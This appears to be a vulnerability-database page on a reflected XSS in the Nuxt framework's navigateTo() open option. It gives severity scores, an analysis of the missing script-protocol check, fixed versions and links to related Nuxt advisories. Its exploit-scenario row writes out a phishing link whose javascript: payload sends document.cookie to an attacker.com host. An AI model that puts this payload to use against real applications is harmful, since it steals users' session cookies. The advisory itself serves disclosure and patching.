Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Network-delivered reflected XSS requiring user interaction; scope change to browser origin; low C/I impact bounded to session context.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Nuxt versions 4.0.0 before 4.4.7 and 3.x before 3.21.7 fail to validate script-capable URLs in the navigateTo open option, allowing client-side script execution. Attackers can supply javascript: URLs through the open parameter to execute arbitrary scripts in the application's origin when user-controlled input is passed to navigateTo.
AnalysisAI
Reflected XSS in Nuxt 3.x before 3.21.7 and 4.x before 4.4.7 enables client-side script execution in the application's first-party origin when user-controlled input is passed to the navigateTo() composable's open parameter. The client-side early-open handler invoked window.open(toPath, ...) without running the isScriptProtocol check that guards the normal navigation path, allowing javascript:, data:, and vbscript: scheme URLs to reach window.open() directly. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the target Nuxt application passes user-controlled input as the URL argument to `navigateTo()` with an `open` option (e.g., `navigateTo(userInput, { open: { target: '_blank' } })`). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N, score 5.3 Medium) accurately reflects the attack characteristics: network-reachable, low complexity, no attacker authentication required, but passive user interaction (UI:P) is a hard prerequisite - the victim must click or be redirected to a crafted URL. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker identifies a Nuxt application that accepts a user-supplied URL parameter (e.g., `?next=`) and passes it directly to `navigateTo(url, { open: { target: '_blank' } })`. The attacker crafts a link such as `https://app.example.com/login?next=javascript:fetch('https://attacker.com/?c='+document.cookie)` and distributes it via phishing. … |
| Remediation | Upgrade to Nuxt 4.4.7 (for 4.x users) or Nuxt 3.21.7 (for 3.x users); these are the vendor-confirmed fixed versions per GHSA-c9cv-mq2m-ppp3. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3. Rated critical severity (CVSS 9.8), this vulnerability is
Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve
Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve
Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated high seve
Nuxt is a free and open-source framework to create full-stack web applications and websites with Vue.js. Rated medium se
Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1. Rated medium severity (CVSS 6.1
Use of Hard-coded Credentials in GitHub repository nuxtlabs/github-module prior to 1.6.2. Rated critical severity (CVSS
Clerk JavaScript is the official JavaScript repository for Clerk authentication. createRouteMatcher in @clerk/nextjs, @c
Route-rule middleware bypass in Nuxt 3.11.0-3.21.6 and 4.0.0-4.4.6 allows remote attackers to evade routeRules-defined p
Nuxt is an open-source web development framework for Vue.js. Rated high severity (CVSS 7.5), this vulnerability is remot
Nuxt is an open-source web development framework for Vue.js. Rated low severity (CVSS 3.1), this vulnerability is remote
Nuxt's development server on Linux exposes an unprotected vite-node IPC server via a Linux abstract-namespace Unix socke
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-38379
GHSA-h345-75vh-jjwf